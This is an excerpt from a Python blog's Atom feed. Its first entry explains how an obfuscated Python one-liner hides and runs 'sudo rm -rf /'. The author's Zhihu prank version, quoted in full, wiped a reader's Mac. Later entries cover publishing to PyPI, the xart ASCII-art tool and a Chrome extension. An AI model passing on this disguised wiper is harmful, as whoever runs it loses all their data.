string. Ignoring for now how that function is defined and what the numbers are, the previous code can be rewritten as:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda decode: getattr(__import__( decode(NUM1) ), decode(NUM2))(decode(NUM3))) (decode_function)</span><br></pre></td></tr></table></figure><p>This already looks more and more like the code in the answer. So how do you map a string to a number? In Python 2, the <code>hex</code> codec does it:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">In [3]: 'hello, world.'.encode('hex')</span><br><span class="line">Out[3]: '68656c6c6f2c20776f726c642e'</span><br><span class="line"></span><br><span class="line">In [4]: int('hello, world.'.encode('hex'), 16)</span><br><span class="line">Out[4]: 8271117963530313756381553648686L</span><br><span class="line"></span><br><span class="line">In [5]: hex(8271117963530313756381553648686L)[2:-1].decode('hex')</span><br><span class="line">Out[5]: 'hello, world.'</span><br></pre></td></tr></table></figure></p><p>With that, the <code>decode_function</code> above and the corresponding numbers are easy to obtain:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">In [6]: encode = lambda s:int(s.encode('hex'), 16)</span><br><span class="line"></span><br><span class="line">In [7]: decode = lambda x: hex(long(x))[2:-1].decode('hex')</span><br><span class="line"></span><br><span class="line">In [8]: encode('os')</span><br><span class="line">Out[8]: 28531</span><br><span class="line"></span><br><span class="line">In [9]: decode(28531)</span><br><span class="line">Out[9]: 'os'</span><br><span class="line"></span><br><span class="line">In [10]: encode('system')</span><br><span class="line">Out[10]: 126965465245037</span><br><span class="line"></span><br><span class="line">In [11]: decode(126965465245037)</span><br><span class="line">Out[11]: 'system'</span><br><span class="line"></span><br><span class="line">In [12]: encode('sudo rm -rf /')</span><br><span class="line">Out[12]: 9147569852652678349977498820655L</span><br><span class="line"></span><br><span class="line">In [13]: decode(9147569852652678349977498820655L)</span><br><span class="line">Out[13]: 'sudo rm -rf /'</span><br></pre></td></tr></table></figure></p><p>Fill them into the earlier code:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda decode: getattr(__import__( decode(28531) ), decode(126965465245037))(decode(9147569852652678349977498820655L))) (lambda x: hex(long(x))[2:-1].decode('hex'))</span><br></pre></td></tr></table></figure></p><p>Finally, we disguise <code>decode</code> a little more. For example, <code>2 == True << True</code> (<code>True == 1</code>), <code>-1 == -True</code>, and the string <code>hex</code> can be obtained from the <code>__name__</code> of the function <code>hex</code>. Passing these as arguments to a lambda that returns the <code>decode</code> function we need, <code>decode</code> becomes:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True)</span><br></pre></td></tr></table></figure></p><p>Put it all together, rename the variables to underscores, and you get the final result:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))</span><br></pre></td></tr></table></figure></p><p><strong>Friendly reminder: please do not try this lightly.</strong></p>]]></content>
<summary type="html">
<p>A while ago I saw a question on Zhihu: <a href="https://www.zhihu.com/question/37046157" target="_blank">"What outrageous things can one line of Python code do?"</a> It looked fun, so I wrote an answer:</p>
<blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; (<span class="keyword">lambda</span> _: getattr(__import__(_(<span class="number">28531</span>)), _(<span class="number">126965465245037</span>))(_(<span class="number">9147569852652678349977498820655</span>)))((<span class="keyword">lambda</span> ___, __, _: <span class="keyword">lambda</span> n: ___(__(n))[_ &lt;&lt; _:-_].decode(___.__name__))(hex, long, <span class="keyword">True</span>))</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
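<p>Works on OS X and Linux, needs to be run with administrator privileges, and the effect is touching.</p>
<p>Author: xlzd<br>Link: <a href="https://www.zhihu.com/question/37046157/answer/101660005" target="_blank">https://www.zhihu.com/question/37046157/answer/101660005</a><br>Source: Zhihu<br>Copyright belongs to the author. Please contact the author for permission to repost.</p>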
</blockquote>
<p>It was meant only as a prank, but to my surprise someone actually ran this line. And then everything on his Mac was wiped... </p>
<p>So how does this line of code do it?</p>
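<p>The large integers in that line are ordinary strings whose bytes have been read as one big-endian number. The original relies on Python 2 idioms, so what follows is a Python 3 sketch of the same mapping rather than the author's code. The names <code>encode</code> and <code>decode</code> are illustrative, and the sketch only converts values; it never imports or runs anything.</p>

```python
def encode(text):
    """Read the ASCII bytes of text as a single big-endian integer."""
    return int.from_bytes(text.encode("ascii"), "big")


def decode(number):
    """Turn such an integer back into the string it was built from."""
    length = (number.bit_length() + 7) // 8  # bytes needed to hold the number
    return number.to_bytes(length, "big").decode("ascii")


print(encode("os"))             # 28531
print(decode(126965465245037))  # system
```

<p>Seen this way, the first two numbers in the one-liner are just a module name and a function name in disguise.</p>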
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>How to Publish Your Own Program to PyPI</title>
<link href="https://xlzd.me/2017/02/05/upload-pypi/"/>
<id>https://xlzd.me/2017/02/05/upload-pypi/</id>
<published>2017-02-05T15:12:24.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<h2 id="这段是废话"><a href="#这段是废话" class="headerlink" title="这段是废话"></a>这段是废话</h2><p>P.S. 这是一篇非常基础的文章,如果你有相关基础,请不必浪费时间阅读。写这篇文章的初衷是收到知友私信问到了怎么讲自己写的程序发布到 PyPI,与其回复一个人的私信,不如写出来供所有初学的人参考参考。<br>PyPI 的全称是「Python Package Index」,官方介绍如是说:</p><blockquote><p>The Python Package Index is a repository of software for the Python programming language. There are currently 102159 packages here. </p></blockquote><p>托管到 PyPI 的仓库,可以方便地通过 easy_install 或 pip 来安装和更新。比如,你直接「 pip install tornado 」就可以方便地安装 tornado 了。</p><p>概念性的东西,就一笔带过吧。这篇博客中,我将以发布一个名为「jujube_pill」的包到 PyPI 为例,从头到尾讲解如何将自己的程序发布到 PyPI。</p><a id="more"></a><h2 id="代码结构"><a href="#代码结构" class="headerlink" title="代码结构"></a>代码结构</h2><p>这里的示例代码结构非常简单,就一个 setup 文件和一个源码文件,结构如下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">jujube-pill $ tree</span><br><span class="line">.</span><br><span class="line">├── jujube_pill</span><br><span class="line">│ └── __init__.py</span><br><span class="line">└── setup.py</span><br></pre></td></tr></table></figure><p>其中 setup.py 如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> setuptools <span class="keyword">import</span> setup</span><br><span class="line"></span><br><span class="line">setup(</span><br><span class="line"> name=<span class="string">'jujube_pill'</span>,</span><br><span class="line"> version=<span class="string">'0.0.1'</span>,</span><br><span class="line"> author=<span class="string">'xlzd'</span>,</span><br><span class="line"> author_email=<span class="string">'what@the.f*ck'</span>,</span><br><span class="line"> url=<span class="string">'https://zhuanlan.zhihu.com/p/26159930'</span>,</span><br><span class="line"> description=<span class="string">u'吃枣药丸'</span>,</span><br><span class="line"> packages=[<span class="string">'jujube_pill'</span>],</span><br><span class="line"> install_requires=[],</span><br><span class="line"> entry_points={</span><br><span class="line"> <span class="string">'console_scripts'</span>: [</span><br><span class="line"> <span class="string">'jujube=jujube_pill:jujube'</span>,</span><br><span class="line"> <span class="string">'pill=jujube_pill:pill'</span></span><br><span class="line"> ]</span><br><span class="line"> }</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>Most of the parameters are self-explanatory, so I won't go through each one, and a few that beginners don't need yet are left out. install_requires lists the libraries this package depends on; when someone installs your package with pip or a similar tool, those dependencies are installed automatically. console_scripts defines the terminal commands the package provides. Here I want the "jujube" and "pill" commands to be available after installation, so with the setup file above, typing "jujube" in a terminal runs the jujube function in the jujube_pill package (in __init__.py).</p><p>The __init__.py file looks like this:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">jujube</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">print</span>(<span class="string">u'吃枣'</span>)</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pill</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">print</span>(<span class="string">u'药丸'</span>)</span><br></pre></td></tr></table></figure><h2 id="上传代码到-PyPI"><a href="#上传代码到-PyPI" class="headerlink" title="上传代码到 PyPI"></a>Uploading the Code to PyPI</h2><p>Before uploading, you can run a command to check whether setup.py contains mistakes:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py check</span><br><span class="line">running check</span><br><span class="line">$</span><br></pre></td></tr></table></figure><p>If no errors are printed, the format is correct.</p><p>Next, register a PyPI account on the PyPI website. Once that is done, you can register this project with PyPI:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py register</span><br><span class="line"></span><br><span class="line">running register</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">We need to know who you are, so please choose either:</span><br><span class="line"> 1. use your existing login,</span><br><span class="line"> 2. register as a new user,</span><br><span class="line"> 3. have the server generate a new password <span class="keyword">for</span> you (and email it to you), or</span><br><span class="line"> 4. quit</span><br><span class="line">Your selection [default 1]: </span><br><span class="line">1</span><br><span class="line">Username: xlzd</span><br><span class="line">Password: </span><br><span class="line">Registering jujube_pill to https://pypi.python.org/pypi</span><br><span class="line">Server response (200): OK</span><br><span class="line">I can store your PyPI login so future submissions will be faster.</span><br><span class="line">(the login will be stored <span class="keyword">in</span> /Users/xlzd/.pypirc)</span><br><span class="line">Save your login (y/N)?y</span><br></pre></td></tr></table></figure><p>I have omitted the output of some intermediate steps. If this is your first time uploading code to PyPI, you need to log in first. If you did not register an account on the website earlier, registering here works too. After you enter your username and password, you are logged in. On success you are asked whether to save your login; if you answer y, a .pypirc file holding your PyPI login details is created in your home directory.</p><p>The next step is to package the code, using the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py &lt;package format&gt;</span><br></pre></td></tr></table></figure><p>The package format is usually "sdist" or "bdist_egg", with the former being more common (sdist can be installed with pip, bdist_egg with easy_install).</p><p>Once the package is built, upload it with the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py upload</span><br></pre></td></tr></table></figure><p>Finally, take a look on PyPI at the package we just uploaded ( <a href="https://pypi.python.org/pypi/jujube_pill" target="_blank" rel="noopener">jujube_pill</a> ).</p><p>In fact, the commands above can also be combined and run in one go:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python setup.py register sdist upload</span><br></pre></td></tr></table></figure></p><h2 id="试试看我们自己发布的库"><a href="#试试看我们自己发布的库" class="headerlink" title="试试看我们自己发布的库"></a>Trying Out the Package We Published</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install jujube_pill</span><br></pre></td></tr></table></figure><p>Once it is installed, both commands are ready to use:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ jujube</span><br><span class="line">吃枣</span><br><span class="line">$ pill</span><br><span class="line">药丸</span><br></pre></td></tr></table></figure><p>Or use the freshly uploaded package from code:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: <span class="keyword">import</span> jujube_pill</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: jujube_pill.jujube()</span><br><span class="line">吃枣</span><br><span 
class="line"></span><br><span class="line">In [<span class="number">3</span>]: jujube_pill.pill()</span><br><span class="line">药丸</span><br></pre></td></tr></table></figure><p>All done.</p>]]></content>
<summary type="html">
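<h2 id="这段是废话"><a href="#这段是废话" class="headerlink" title="这段是废话"></a>This Part Is Filler</h2><p>P.S. This is a very basic article; if you already know the basics, there is no need to spend time on it. I wrote it because a Zhihu follower sent me a private message asking how to publish a program to PyPI, and rather than answer one person privately, I decided to write it up for every beginner's reference.<br>PyPI stands for "Python Package Index". The official description reads:</p>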
<blockquote>
<p>The Python Package Index is a repository of software for the Python programming language. There are currently 102159 packages here. </p>
</blockquote>
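<p>Packages hosted on PyPI can be installed and upgraded conveniently with easy_install or pip. For example, running "pip install tornado" installs tornado.</p>
<p>So much for the concepts. In this post I will walk through the whole process of publishing your own program to PyPI, using a package named "jujube_pill" as the example.</p>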
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>xart: generate art ascii texts. </title>
<link href="https://xlzd.me/2016/11/04/xart/"/>
<id>https://xlzd.me/2016/11/04/xart/</id>
<published>2016-11-03T16:02:02.000Z</published>
<updated>2019-05-14T06:33:49.584Z</updated>
<content type="html"><![CDATA[<h1 id="xart-generate-art-ascii-texts"><a href="#xart-generate-art-ascii-texts" class="headerlink" title="xart: generate art ascii texts. "></a>xart: generate art ascii texts. <img src="https://img.shields.io/pypi/v/xart.svg?label=version" alt="Version"> <img src="https://img.shields.io/badge/license-WTFPL-007EC7.svg" alt="WTFPL License"></h1><p><code>xart</code> is a pure Python library that provides an easy way to generate art ascii texts. Life is short, be cool.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">██╗ ██╗ █████╗ ██████╗ ████████╗</span><br><span class="line">╚██╗██╔╝██╔══██╗██╔══██╗╚══██╔══╝</span><br><span class="line"> ╚███╔╝ ███████║██████╔╝ ██║</span><br><span class="line"> ██╔██╗ ██╔══██║██╔══██╗ ██║</span><br><span class="line">██╔╝ ██╗██║ ██║██║ ██║ ██║</span><br><span class="line">╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝</span><br></pre></td></tr></table></figure><a id="more"></a><h3 id="Getting-Started"><a href="#Getting-Started" class="headerlink" title="Getting Started"></a>Getting Started</h3><hr><h4 id="help"><a href="#help" class="headerlink" title="help"></a>help</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ xart -h</span><br><span class="line">usage: xart [-h] [-f FONT] [-i] [-s] [-l] [-v]</span><br><span 
class="line"></span><br><span class="line">xart : generate art ascii texts.</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"> -f FONT, --font FONT font to render with, default random</span><br><span class="line"> -i, --info show information of given font</span><br><span class="line"> -s, --show show random fonts</span><br><span class="line"> -l, --list list all supported fonts</span><br><span class="line"> -v, --version version</span><br></pre></td></tr></table></figure><h4 id="generate-ascii-text-via-random-font"><a href="#generate-ascii-text-via-random-font" class="headerlink" title="generate ascii text via random font"></a>generate ascii text via random font</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ xart test</span><br><span class="line">.-..-..-. .-..--. .-..-. 
.-..-..-.</span><br><span class="line"> ~ | | ~ | | ~~ | | ~ ~ | | ~</span><br><span class="line"> | | | | _ \| | |</span><br><span class="line"> | | | |`-' |\ | |</span><br><span class="line"> | | | | __ _ | | | |</span><br><span class="line"> `-' `-'`--' `-'`-' `-'</span><br></pre></td></tr></table></figure><h4 id="generate-ascii-text-via-given-font"><a href="#generate-ascii-text-via-given-font" class="headerlink" title="generate ascii text via given font"></a>generate ascii text via given font</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$ xart test -f 3D_Diagonal</span><br><span class="line"></span><br><span class="line"> ___ ___</span><br><span class="line"> ,--.'|_ ,--.'|_</span><br><span class="line"> | | :,' | | :,'</span><br><span class="line"> : : ' : .--.--. : : ' :</span><br><span class="line">.;__,' / ,---. / / ' .;__,' /</span><br><span class="line">| | | / \ | : /`./ | | |</span><br><span class="line">:__,'| : / / | | : ;_ :__,'| :</span><br><span class="line"> ' : |__ . ' / | \ \ `. ' : |__</span><br><span class="line"> | | '.'| ' ; /| `----. \ | | '.'|</span><br><span class="line"> ; : ; ' | / | / /`--' / ; : ;</span><br><span class="line"> | , / | : | '--'. 
/ | , /</span><br><span class="line"> ---`-' \ \ / `--'---' ---`-'</span><br><span class="line"> `----'</span><br></pre></td></tr></table></figure><h4 id="show-all-supported-fonts"><a href="#show-all-supported-fonts" class="headerlink" title="show all supported fonts"></a>show all supported fonts</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ xart -l</span><br><span class="line">xart : generate art ascii texts.</span><br><span class="line"></span><br><span class="line"> 0. 1Row</span><br><span class="line"> 1. 3-D</span><br><span class="line"> ...</span><br><span class="line"> 277. Wow</span><br><span class="line"></span><br><span class="line">All 278 fonts.</span><br></pre></td></tr></table></figure><h4 id="show-font-infomation"><a href="#show-font-infomation" class="headerlink" title="show font infomation"></a>show font information</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ xart -i -f Weird</span><br><span class="line">weird.flf (version 2)</span><br><span class="line">by: Bas Meijer meijer@info.win.tue.nl bas@damek.kth.se</span><br><span class="line">fixed by: Ryan Youck 
youck@cs.uregina.ca</span><br><span class="line">some special characters '#%*' etc. are not matching, they are from other fonts.</span><br><span class="line">Explanation of first line:</span><br><span class="line">flf2 - "magic number" for file identification</span><br><span class="line">a - should always be `a', for now</span><br><span class="line">$ - the "hardblank" -- prints as a blank, but can't be smushed</span><br><span class="line">6 - height of a character</span><br><span class="line">5 - height of a character, not including descenders</span><br><span class="line">20 - max line length (excluding comment lines) + a fudge factor</span><br><span class="line">15 - default smushmode for this font (like "-m 15" on command line)</span><br><span class="line">13 - number of comment lines</span><br></pre></td></tr></table></figure><h4 id="version"><a href="#version" class="headerlink" title="version"></a>version</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ xart -v</span><br><span class="line">xart : generate art ascii fonts, version 0.1.5.</span><br><span class="line"> ____ ____ ______</span><br><span class="line"> / __ \ / / | ___(</span><br><span class="line">( ( ) ) / /) ) | |__</span><br><span class="line">( ( ) ) /_/( ( |___ \</span><br><span class="line">( ( ) ) ) ) \ \</span><br><span class="line">( (__) ) __ ( ( __ _____) )</span><br><span class="line"> \____/ (__) /__\ (__) )_____/</span><br></pre></td></tr></table></figure><h3 id="Installation"><a href="#Installation" class="headerlink" title="Installation"></a>Installation</h3><hr><p><code>xart</code> is hosted on <a 
href="https://pypi.python.org/pypi/xart" target="_blank" rel="noopener">PyPI</a> and can be installed with pip:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install xart</span><br></pre></td></tr></table></figure><p>Alternatively, you can get the latest source code from <a href="https://github.com/xlzd/xart" target="_blank" rel="noopener">GitHub</a> and install it manually:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git clone git@github.com:xlzd/xart.git</span><br><span class="line">$ cd xart</span><br><span class="line">$ python setup.py install</span><br></pre></td></tr></table></figure><p>To upgrade:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install xart --upgrade</span><br></pre></td></tr></table></figure><h3 id="License"><a href="#License" class="headerlink" title="License"></a>License</h3><hr><p>WTFPL (<a href="https://github.com/xlzd/xart/blob/master/LICENSE" target="_blank" rel="noopener">here</a>)</p>]]></content>
<summary type="html">
<h1 id="xart-generate-art-ascii-texts"><a href="#xart-generate-art-ascii-texts" class="headerlink" title="xart: generate art ascii texts. "></a>xart: generate art ascii texts. <img src="https://img.shields.io/pypi/v/xart.svg?label=version" alt="Version"> <img src="https://img.shields.io/badge/license-WTFPL-007EC7.svg" alt="WTFPL License"></h1><p><code>xart</code> is a pure Python library that provides an easy way to generate art ascii texts. Life is short, be cool.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">██╗ ██╗ █████╗ ██████╗ ████████╗</span><br><span class="line">╚██╗██╔╝██╔══██╗██╔══██╗╚══██╔══╝</span><br><span class="line"> ╚███╔╝ ███████║██████╔╝ ██║</span><br><span class="line"> ██╔██╗ ██╔══██║██╔══██╗ ██║</span><br><span class="line">██╔╝ ██╗██║ ██║██║ ██║ ██║</span><br><span class="line">╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝</span><br></pre></td></tr></table></figure>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>Zhihu Fishhook: Blast Fishing with Technology</title>
<link href="https://xlzd.me/2016/10/17/zhfishhook/"/>
<id>https://xlzd.me/2016/10/17/zhfishhook/</id>
<published>2016-10-17T11:49:47.000Z</published>
<updated>2019-05-14T06:33:49.585Z</updated>
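<content type="html"><![CDATA[<h1 id="zhfishhook-知乎鱼钩"><a href="#zhfishhook-知乎鱼钩" class="headerlink" title="zhfishhook 知乎鱼钩"></a>zhfishhook: Zhihu Fishhook</h1><hr><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h2><p>Zhihu has a large number of "fishing" questions, for example:</p><ul><li>Does having a large bust really make you more confident? - Fishing (in the broad sense)</li><li>Why are toned glutes so attractive, and how can women train them? - Fishing (in the broad sense)</li><li>How do you style stockings so they look elegant rather than tacky? - Fishing (in the broad sense)</li><li>...</li></ul><p>These questions all attract plenty of "fish" who take the bait and post photos, and they have also given rise to upvote-to-share behavior such as "轮带逛" and "葡带逛". However, browsing these questions comes with one very poor experience: <strong>photo answers may be separated by many text-only answers, which breaks the continuity of viewing the images</strong>.</p><p>This extension aims to solve that problem. When you open a Zhihu question page that contains images, the following button appears in the top-left corner:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p1.png" alt="p1.png"></p><p>After you press the button, the page changes to look like this:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p2.png" alt="p2.png"></p><p>Paging further:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p3.png" alt="p3.png"></p><hr><h2 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>Keyboard Shortcuts</h2><p>If you prefer the keyboard, the following shortcuts are available:</p><table><thead><tr><th>Key</th><th>Action</th></tr></thead><tbody><tr><td><code>s</code></td><td>Enter or exit image browsing mode</td></tr><tr><td><code>esc</code></td><td>Exit image browsing mode</td></tr><tr><td><code>↑</code> <code>←</code></td><td>Previous image</td></tr><tr><td><code>↓</code> <code>→</code></td><td>Next image</td></tr></tbody></table><hr><h2 id="插件下载"><a href="#插件下载" class="headerlink" title="插件下载"></a>Download</h2><p>Download link: <a href="https://raw.githubusercontent.com/xlzd/zhfishhook/master/release/zhfishhook.crx" target="_blank">https://raw.githubusercontent.com/xlzd/zhfishhook/master/release/zhfishhook.crx</a></p><p>For installation, see my earlier Zhihu column post: <a href="https://zhuanlan.zhihu.com/p/22107246?refer=xlz-d" target="_blank">「云拉黑」是什么 - xlzd杂谈 - 知乎专栏</a></p><hr><h2 id="后续功能"><a href="#后续功能" class="headerlink" title="后续功能"></a>Planned Features</h2><ul><li>Load more</li><li>Autoplay mode</li><li>Recommended reading (popular fishing questions)</li><li>Suggestions welcome</li></ul>]]></content>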
<summary type="html">
<h1 id="zhfishhook-知乎鱼钩"><a href="#zhfishhook-知乎鱼钩" class="headerlink" title="zhfishhook 知乎鱼钩"></a>zhfishhook: Zhihu Fishhook</h1><hr>
<h2 id="简介"><a h
</summary>
<category term="chrome-extension" scheme="https://xlzd.me/tags/chrome-extension/"/>
</entry>
<entry>
<title>How to Install an OpenVPN Server on Ubuntu 16.04</title>
<link href="https://xlzd.me/2016/10/10/openvpn/"/>
<id>https://xlzd.me/2016/10/10/openvpn/</id>
<published>2016-10-10T01:20:04.000Z</published>
<updated>2019-05-14T06:33:49.579Z</updated>
